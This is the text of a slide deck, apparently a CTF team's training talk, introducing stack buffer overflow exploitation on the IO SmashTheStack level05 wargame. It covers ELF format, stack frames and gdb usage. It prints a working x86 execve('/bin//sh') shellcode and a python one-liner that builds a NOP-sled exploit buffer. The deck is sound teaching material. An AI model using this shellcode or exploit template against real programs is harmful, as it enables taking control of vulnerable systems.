Tweet
Tweet

Slide 1

Slide 1 text

Introduction to Exploitation kelwin blue-lotus

Slide 2

Slide 2 text

Basic Goals • Exploit basic buffer overflow by yourself – Understand basic memory vulnerabilities – Basic use of gdb – Basic use of shellcode

Slide 3

Slide 3 text

IO SmashTheStack Level05.c

Slide 4

Slide 4 text

ELF Format • Executable and Linkable Format • 3 main types of object files – relocatable file: gcc –c test.c => test.o(test.a) – executable file: gcc –o test test.c => test – shared object file: test.so • Parallel views – Linking View – Execution View

Slide 5

Slide 5 text

ELF Header

Slide 6

Slide 6 text

Section Header Table

Slide 7

Slide 7 text

Program Header Table gcc: -z execstack

Slide 8

Slide 8 text

About Stack • Region of memory managed with stack discipline • Grows toward lower addresses • Register %esp indicates lowest stack address – address of top element • Stack Operations – pushl -> %esp+4 – popl -> %esp-4 byte byte … byte byte %esp Stack Top Stack Bottom

Slide 9

Slide 9 text

Calling Convention(cdecl) %ebp in caller’s caller 3 2 1 return address %ebp in caller

Slide 10

Slide 10 text

Memory Layout(Linux X86) • Stack • Shared Libraries • Heap • Data(Global/Static) • Text For Kernal Stack shared libraries Heap Data Text Unused 0xC0000000 0x40000000 0x00000000 0x08048000 0xFFFFFFFF %esp

Slide 11

Slide 11 text

Stack Frame arguments return address stack frame pointer [exception handlers] local variables callee saved registers For Kernal Stack shared libraries Heap Data Text Unused 0xC0000000 0x40000000 0x00000000 0x08048000 0xFFFFFFFF %ebp previous stack frame pointer %esp

Slide 12

Slide 12 text

objdump –d level05

Slide 13

Slide 13 text

objdump –d level05 char * strcpy ( char * destination, const char * source );

Slide 14

Slide 14 text

objdump –d –j

Slide 15

Slide 15 text

Buffer Overflow char **argv int argc return address previous %ebp char buf[128]

Slide 16

Slide 16 text

Buffer Overflow char **argv int argc char buf[132~135] char buf[128~131] char buf[0~127]

Slide 17

Slide 17 text

GDB • Starting GDB – gdb program + run [arglist] – gdb –args program [arglist] + run – attach pid • Stopping GDB – quit – Ctrl-d

Slide 18

Slide 18 text

GDB • Breakpoints and Watchpoints – break function – break *addr – info break – clear function – delete/enable/disable [n] – watch expr – info watch

Slide 19

Slide 19 text

GDB • Execution Control – continue – step – stepi – next – nexti

Slide 20

Slide 20 text

GDB • Display – print [/f] expr • x hex • d signed decimal • u unsigned decimal • o octal • t binary • a address • c character • f floating point – info reg [rn]

Slide 21

Slide 21 text

GDB • Display – x [/Nuf] expr • N count of units to display • u unit size – b bytes – h halfwords (two bytes) – w words (four bytes) – g giant words (eight bytes) • f printing format – s null-terminated string – i machine instructions – disassem [addr]

Slide 22

Slide 22 text

GDB • demo – view arguments and environment variables – view stack structure – insert breakpoints and control execution

Slide 23

Slide 23 text

Buffer Overflow Exploit char **argv int argc evil code address evil code evil code Contruct evil buffer: buf = evil_code + evil_code_address

Slide 24

Slide 24 text

Buffer Overflow Exploit evil code evil code evil code address Useless buf Useless buf Contruct evil buffer: buf = evil_code + evil_code_address

Slide 25

Slide 25 text

Shellcode • What is shellcode – A small piece of code used as the payload in the exploitation of a software vulnerability – Typically it starts a command shell from which the attacker can control the compromised machine • What we use here – We use execve system call to obtain a high- permission level shell

Slide 26

Slide 26 text

Shellcode 0 //sh /bin 0 string syscall calling convention %eax=0xb %ebx=filename %ecx=argv %edx=envp %esi %edi %ebp %esp "/bin//sh" CLTD converts signed long word EAX to double word EDX:EAX int execve(const char *filename, char *const argv[], char *const envp[]);

Slide 27

Slide 27 text

Shellcode

Slide 28

Slide 28 text

Shellcode SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

Slide 29

Slide 29 text

Exploit • Construct Attacking Buffer – buf = NOP+SHELLCODE+RET_ADDRESS • How to find return address – debuging – pattern_tool.py from metasploit • “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3 Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7A c8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1A e2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2A”

Slide 30

Slide 30 text

Practice 1 • ssh –p2222 111.111.111.111 • password: bl******* • capture the level05.flag • ./level05 $(python –c ‘print “\x90”* 50 + “\x31….\x80”+”\x90”*n+”\xff\xff\xff\xbf”*m’)

Slide 31

Slide 31 text

More Vulnerabilities • Heap Overflow • Integer Overflow • Format String • Heap Spray We Need Your Presentations!

Slide 32

Slide 32 text

Platform Defenses and More Exploitations • DEP/W^X – Return-to-libc/Return Oriented Programing (ROP) • ASLR – jmp esp/ret2ret/… Call For Presentations!

Slide 33

Slide 33 text

How to learn • CTFs • Wargames – io smash the stack – exploit-excercises.com • Presentations • Open Courses

Slide 34

Slide 34 text

RuCTFE 2012 • Call for participants! • 比赛时间:11月24日23:00~11月25日7:00 • 比赛规则:两轮攻防 • 11月19日下午13:00 3-230模拟训练

Slide 35

Slide 35 text

Practice 2 • ssh –p2222 111.111.111.111 • password: bl******* • capture the level07.flag